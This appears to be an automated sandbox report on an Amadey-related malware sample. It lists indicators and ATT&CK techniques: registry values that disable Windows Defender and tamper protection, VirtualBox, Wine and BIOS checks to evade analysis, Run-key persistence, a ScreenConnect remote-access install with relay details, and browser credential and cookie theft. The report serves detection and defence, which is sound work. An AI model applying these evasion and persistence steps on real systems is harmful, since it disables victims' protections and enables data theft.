amadey | e0dd54e04f86e6a32d6e442e8267d7b67d838c9976dff81bf8e2ec4f04d6bfaa

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	194101cee1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	194101cee1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	194101cee1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	194101cee1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	194101cee1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 6300 created 2552	6300	98fc6973d9.exe	42

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	Process not Found

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3QU4MGFSIPB37EB0HOOT5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4ipQYBO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e4a30b7394.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	98fc6973d9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2b3f2f85be.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	file.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ee69ff11d6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	194101cee1.exe

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/3628-855-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3628-856-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3628-857-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3628-858-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3628-859-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3628-860-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3628-861-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3628-864-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3628-866-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3628-867-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig

Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

credential_access stealer

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (9e47e837d725d609)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (9e47e837d725d609)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=instance-m858nm-relay.screenconnect.com&p=443&s=aeaf4b13-6784-48f3-b202-0af1b5ebb536&k=BgIAAACkAABSU0ExAAgAAAEAAQAVnkKvoJ2a5Owy72d6CsGdKvHoeDC4B57FaJ6Hxr4F3MVrvri8W9EBpR76DnouoQOLdhagN9jXLv1DU9oYtbUyE5f22RxeyKb5ACDc8ergbSKA6QVCTyTw%2b3U%2fOzjOQHcKvuOA1wvUksct4fMl%2fH6deBklLuXsqF5i5v%2be0%2fy69N3M%2byB6qBKOsSPdQFoez5pkMEvZ%2bP26YFGRbMQy7WBZp%2bnngJN34UsDIkAV0RR4%2foS8UwkCPPERznjyO7T3iiIpbJgk9Xyyo9LATv0PIVIobYuVGgw6FX9yR8iM6FgVacp6H5r7KSQo5HS13%2bcfCkJbSoce8r%2fzHSz0DB93mjez&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAATEsmPOMyVkOonVeptikfaAAAAAACAAAAAAAQZgAAAAEAACAAAAD0wKPVzG5NHoHZ7o5ZHGbKTLEmC7UXDyhkpdjy1GitpQAAAAAOgAAAAAIAACAAAADZZWJFXwzwUY7PSvTN071X%2fUBtn4vMmv9GEG5%2fUFzpDqAEAACGqzJPiE88aqT6Q62gImJIWWplmbXHQiqKU%2f7IWaAxCJsqSc7Qyk7q4u3XORUmqXzHCjjm4UTz8kJ4KAMFjPHzzgV1wM2W6KJFeCQcPMhC0Pu4sNqUW55UKSNb9sOWGTt5kdXIPP6%2fZjE5GawtuZAm2ETCWaGBQhPsFXXqFJMJ9krXryKLs0bklKFjG4vrHNybrWS6iNiXTrYwv6tAMmJ8mof49l11%2b4aDH3fajwb%2f81X9f1n7wKFRs5QcBpIIEQe2gkwxB2yPLt4Dxqn6pWLxoUtjNlOapOiu4m%2brK%2fmM1CQK9cVDApnN7TfqyU9oxve8gdluaO6VWBgAkQqH3IqYyC%2bp3GElwy0YdqxoC9V21I4M%2fVPpIHT55ByrjkCeJeiy5HLMfVpncyahy5t3%2fY%2fAEdH8QAJ3uLHtrrwyQfeegfv%2fWNmQKWlNIvaRFhhTMwqFYHvosM0FP0dIfYaC2txMHfmsJd2AUCny3ZY6odXIBkaq5Q3v%2fUeU25j1fGHeY4VfEWOhwm4o08UdiSnOk2HT57%2bq6vlxIZAl%2bMV%2bcQi3ZhSsqUfaiuHzlxowymvErhYPRKvIi73%2fssgrF6QtO%2fcEZi2ivifpHQicHchF3qTkMuOUFvQ49WlhRtBhzxzLQ%2fRyujE%2f0GoA0nfUvGDlrgFPXhJmMzkZIegSk5wGi5Gn8YCtPrMN7%2fg7c9840TitlrqTmMga9XskxxqYV4Jv2Mycal4HeR8rFx%2bljej8KkqZPCrQ5z%2f%2fCKe6mRGbPCHVJD5kfCpiuEj4ZtJ%2fyIM4YKMRJn7whZgcMvQtvE8P42qdpi4C9vK8jzI%2b0FDVfb14B8ifN6kuBex%2b9MaemOoOKkSTTRrvvNJsuT%2fB39IkEffZGLUjDeZDQuPl940vsLBmRqDB3CoxdG9DlfJ2Jl0WavExAWfQdJfWK6vhJ9f8di7ypTx9gyLLnPCmaBfJqNpnse8hZIdoOcNrFlxQRNbLa6dWUIP2Z3RCwOk4oNeksJlFJFxOV5zd8XGb0Vfof%2bxuIdiWFlv3NlDuKBUOmLxvBRhVdV7jHKOHSLy31QMYDDF3fNMrvg1w3AyDmiTnuAFbKbdabPBomkhQVpnaU4kLkRnd2qA03njMMj1SBKBvHGl2fWzIRQv7dswRy9ytTVtppWXi6mmKucvOq0VkEmkYc1IvxFfuZjxa3SoRKa62Btca3fIhWLuOGqzbpPSVfoJsGA4gvfHbH9fGveknSc4JD4bIHyaLS%2b2qg0heycMA6N39crvfB%2bodhNUu5cP0bVKWyFwhmbX8mhhT534Q42%2buu5bW9EyGk2emRM17zj7JjKWF0hkMTvMoXKpAP6jTq8Rjrtgm7fGd4bf0UL57Z1gWGszBNyKpBkemrkSf%2ba649r%2f283VmOWO3Sz7BoFBZL8qsjClpYdQp1p5sWckdcxvnZ5j5Ghk2b0Vp7n5zaHHbISdPOkJicjK8tp%2fu9FDamMOrNFp9l1eASJuGMuM79mmUW85XMAO7LWUX0ZFx6cKj7W9LPvV%2fVe%2f5O8qtv9mFioXlDa3cp7zR23Z1ph8PnglcXTD%2fbdF9o7tmiUXI8vA6b1tmA0AAAAAW5nfNgBUvj4DVoSfcSOdeN8NTe7XmUglz3xQpetJKs8N8%2fN3mmCpC7E5tea41fwK0r%2fXxAcYfI9Uit1PD1xLo\""	ScreenConnect.ClientService.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
6044	chrome.exe
3588	chrome.exe
5308	msedge.exe
6744	msedge.exe
6904	msedge.exe
4880	chrome.exe
5272	chrome.exe
6716	msedge.exe
872	msedge.exe

Checks BIOS information in registry 2 TTPs 28 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3QU4MGFSIPB37EB0HOOT5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4ipQYBO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e4a30b7394.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e4a30b7394.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2b3f2f85be.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ee69ff11d6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3QU4MGFSIPB37EB0HOOT5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4ipQYBO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ee69ff11d6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	194101cee1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	194101cee1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	98fc6973d9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	98fc6973d9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2b3f2f85be.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	software1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	ZoomUpdateInstallerFull.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	a309bea949.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	ee69ff11d6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	file.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X91lnt.lnk	software1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X91lnt.lnk	software1.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
2452	skotes.exe
4756	4ipQYBO.exe
3168	bEp1dJF.exe
1956	software1.exe
1796	ZoomUpdateInstallerFull.exe
4328	e4a30b7394.exe
2516	a309bea949.exe
2512	2b3f2f85be.exe
1776	7z.exe
4464	7z.exe
4988	7z.exe
5072	ScreenConnect.ClientService.exe
3896	7z.exe
3040	7z.exe
3516	7z.exe
1532	7z.exe
1988	7z.exe
4836	in.exe
5436	ScreenConnect.WindowsClient.exe
5628	ScreenConnect.WindowsClient.exe
5740	ee69ff11d6.exe
2032	7165bda865.exe
5776	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
6964	3QU4MGFSIPB37EB0HOOT5.exe
6396	194101cee1.exe
6492	skotes.exe
1044	Intel_PTT_EK_Recertification.exe
7156	X91lnt.exe
6300	98fc6973d9.exe
1288	53f031f69f.exe
6744	53f031f69f.exe
5952	53f031f69f.exe
6948	53f031f69f.exe
1876	53f031f69f.exe
5920	53f031f69f.exe
4892	53f031f69f.exe
5640	53f031f69f.exe
5644	53f031f69f.exe
5656	53f031f69f.exe
5652	53f031f69f.exe
2564	53f031f69f.exe
5976	53f031f69f.exe
5764	53f031f69f.exe
3320	53f031f69f.exe
5768	53f031f69f.exe
5516	53f031f69f.exe
6548	53f031f69f.exe
7148	53f031f69f.exe
704	53f031f69f.exe
7144	53f031f69f.exe
7128	53f031f69f.exe
1624	53f031f69f.exe
5256	53f031f69f.exe
5732	53f031f69f.exe
1020	53f031f69f.exe
2300	53f031f69f.exe
1772	53f031f69f.exe
6984	53f031f69f.exe
7124	53f031f69f.exe
7116	53f031f69f.exe
3512	53f031f69f.exe
6980	53f031f69f.exe
1652	53f031f69f.exe
1160	53f031f69f.exe

Identifies Wine through registry keys 2 TTPs 14 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	ee69ff11d6.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	3QU4MGFSIPB37EB0HOOT5.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	2b3f2f85be.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	194101cee1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	98fc6973d9.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	4ipQYBO.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	Process not Found
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	file.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	e4a30b7394.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe

Loads dropped DLL 33 IoCs

pid	Process
3168	bEp1dJF.exe
4224	MsiExec.exe
4092	rundll32.exe
4092	rundll32.exe
4092	rundll32.exe
4092	rundll32.exe
4092	rundll32.exe
4092	rundll32.exe
4092	rundll32.exe
4092	rundll32.exe
4092	rundll32.exe
824	MsiExec.exe
1776	7z.exe
4464	7z.exe
3168	MsiExec.exe
4988	7z.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
3896	7z.exe
3040	7z.exe
3516	7z.exe
1532	7z.exe
1988	7z.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5740	ee69ff11d6.exe
5740	ee69ff11d6.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	194101cee1.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\X91lnt = "C:\\Users\\Admin\\AppData\\Roaming\\X91lnt.exe"	software1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2b3f2f85be.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1016270001\\2b3f2f85be.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ee69ff11d6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1016271001\\ee69ff11d6.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7165bda865.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1016272001\\7165bda865.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\194101cee1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1016273001\\194101cee1.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0009000000023cee-427.dat	autoit_exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390065003400370065003800330037006400370032003500640036003000390029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (9e47e837d725d609)\gse5zwrl.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (9e47e837d725d609)\gse5zwrl.newcfg	ScreenConnect.ClientService.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

pid	Process
5036	file.exe
2452	skotes.exe
4756	4ipQYBO.exe
4328	e4a30b7394.exe
2512	2b3f2f85be.exe
5740	ee69ff11d6.exe
5776	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
6964	3QU4MGFSIPB37EB0HOOT5.exe
6396	194101cee1.exe
6492	skotes.exe
6300	98fc6973d9.exe
81048	Process not Found
86932	Process not Found
131640	Process not Found

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3168 set thread context of 4520	3168	bEp1dJF.exe	99
PID 1044 set thread context of 3628	1044	Intel_PTT_EK_Recertification.exe	202

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4836-342-0x00007FF743180000-0x00007FF743610000-memory.dmp	upx
behavioral2/memory/1044-853-0x00007FF768C20000-0x00007FF7690B0000-memory.dmp	upx
behavioral2/memory/1044-863-0x00007FF768C20000-0x00007FF7690B0000-memory.dmp	upx
behavioral2/memory/244524-3979-0x00007FF768C20000-0x00007FF7690B0000-memory.dmp	upx

Drops file in Program Files directory 19 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsFileManager.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\Client.Override.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\system.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\Client.Override.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsClient.exe	msiexec.exe
